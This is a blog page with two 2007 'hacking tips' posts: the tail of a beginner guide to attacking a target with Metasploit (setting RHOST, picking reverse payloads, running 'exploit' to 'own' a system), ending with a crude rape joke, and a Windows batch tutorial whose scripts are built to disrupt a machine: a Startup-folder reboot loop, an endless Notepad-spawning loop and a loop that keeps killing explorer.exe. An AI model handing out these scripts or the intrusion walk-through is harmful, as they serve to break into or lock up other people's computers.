now, "show payloads" will show you the payloads available, using a reverse bind will give you the prompt, others you will have to connect yourself through netcat. Also, note that it has FreeBSD, win32, and Linux payloads, depending on the system. Right, now type "show options" and it will give you a list of options, which will show you the various parameters for the specific exploit you're working with. Set RHOST to the IP of your target by "set RHOST 192.168.1.1" and set LPORT as the listening port you want, port 4444 is the default. If you want to reset it all, just type "back" into your console.
If all is well, then all you need to type is "exploit" and metasploit will do it all for you, and once again you have just owned another system.
The final method is writing the exploit yourself. This is a more advanced level, and there are many places that teach you the basics; phrack.org has some good tutorials. But there is no tutorial that will teach you how to write your own exploits every time, because after all, programming is about learning by yourself through experience and practice.
If you have any further questions, then please please use google, google really is a hacker's best friend, and it has all the answers to life's problems ;-) If all else fails, then please feel free to mail me at paranoiahax@live.com.
This article was intended for the newbies out there who are still unsure about what the elite call "real hacking" and I apologise if it isn't very well structured, as I am not too good at writing articles.
One final note is that using these methods illegally and improperly will probably land you a one way ticket to jail, you will not pass go, will not collect £200 and will get raped by a big white man called Bubba. Use the skills taught here for ethical reasons only, and neither HackThisSite nor myself are responsible for any actions that you take, or any damage that you cause. You have been warned.
Posted by Venkatesh Vedhakumar at Tuesday, June 05, 2007
Labels: Hacking tips
CMD, the basics and a few scripts
First of all, I realize there are other articles about this kind of stuff
But I bring up some other stuff that they didn't.
--------------------------------------------------------------------
CMD
CMD is short for commander.
It is great for a lot of things and it's also very clean.
-----------------------------------------------------------------------------------------------
Let's learn how to make the computer shut down every time it's booted, shall we?
-----------------------------------------------------------------------------------------------
First open CMD,
Next open notepad.
If you write "start shutdown -r" in CMD and press Enter, your computer will restart. The same happens if you write it in "Run".
(Change -r to -s to shut the computer down, or use -l to log off.)
If you write
---------------------------------------
@echo off
cls
start shutdown -r
cls
---------------------------------------
in Notepad and save it as something.bat (the .bat extension is important) and then open it, your computer will restart in the same way.
So, let's get into autostart. Put that bat file in the Startup folder (which can be found in the Start menu) and each time your computer is booted it will run that file and your computer will restart.
If you write the next script, your computer will try to shut down several times at once; it will freak out for about half a minute and then turn off.
Let's get a better understanding of how scripts work. The above script shuts down your computer, but a bat file normally opens CMD and does whatever you told it to do.
@echo off - This stops the commands that follow from being shown as text. For example cls: you don't want that shown as text, it's a command.
cls - This one is pretty good; it clears the text in the CMD screen.
CMD - This command gives you a new CMD session.
start - This triggers stuff, in this case shutdown.
color - Changes the colour in the CMD window. I recommend writing "color 0a", which is a green colour that's really cool on a black window.
title - Write "title something" to change the title.
goto :a - This one is really, really, really, really cool. It's used for making loops and some more advanced stuff that I won't go into. Let's say you write
--------------------------------------
@echo off
:a
cls
start shutdown -r
cls
goto :a
--------------------------------------
The goto :a tells CMD to jump to the line ":a" higher up in the script, so it runs the lines below the label again, reaches goto :a again, and so on. Basically a loop, and since nothing inside it ever changes, an endless one (Ctrl+C in the window, or closing the window, is the only way out). You can change the "a" to whatever you want, for example "error". This is
only to make it easier for you to read your script.
The : infront of "a" must stay where it is.
Bad example:
goto: a
Good example:
goto :a
--------------------------------------
dir - This shows you the files in the directory you are in.
dir /s - This also lists every subdirectory, so if you run it from the root of a drive (cd \) it shows you all the files on that drive.
echo - write "echo something" and it will be printed as text in CMD.
echo. - This prints an empty line (a line break).
cd - Write cd followed by a location to go there in CMD. For example "cd c:\windows".
cd .. - This goes up one level in the directory tree. For example if you're in c:\windows and write "cd .." you go back to c:\.
So now you know the basics, which we'll use to make your computer do stuff. In CMD you can write "help" to get a list of most
commands, and "help dir" (or "dir /?") to see the switches of one particular command.
Moving away from learning commands now.
-----------------------------------------------------------------------------------------------
Let's make a spam script.
-----------------------------------------------------------------------------------------------
-----------------------------------------------
@echo off
cls
:a
rem start returns immediately, so every pass opens one more Notepad
start notepad.exe
goto :a
-----------------------------------------------
This script will keep opening Notepad windows until you close the CMD window (or press Ctrl+C in it). Each pass adds another process, so it is not recommended on a slow computer.
As we said before, "start" launches things; here it launches notepad.exe, and then the loop (goto :a) runs that line again.
-----------------------------------------------------------------------------------------------
Let's just mess around.
-----------------------------------------------------------------------------------------------
-----------------------------------------------
@echo off
cls
:a
rem /im selects the process by image name, /f forces it to end
taskkill /im explorer.exe /f
goto :a
-----------------------------------------------
explorer.exe is the Windows shell, so this closes the taskbar (the bar at the bottom of the screen where the Start menu and your open programs are shown; when you open your browser, that is where it appears), the desktop icons and any open folder windows. Other programs, such as the browser itself, keep running, but the bar they are listed in is gone. Because of the loop, Explorer is killed again every time Windows brings it back.
Closing this will leave people with little they can do. To recover, open Task Manager with Ctrl+Shift+Esc (it works without Explorer), end the cmd.exe process that is running the loop, and then use File > New Task to start explorer again.
Hope you liked the article. If you think I missed something please contact me.
Posted by Venkatesh Vedhakumar at Tuesday, June 05, 2007
Labels: Hacking tips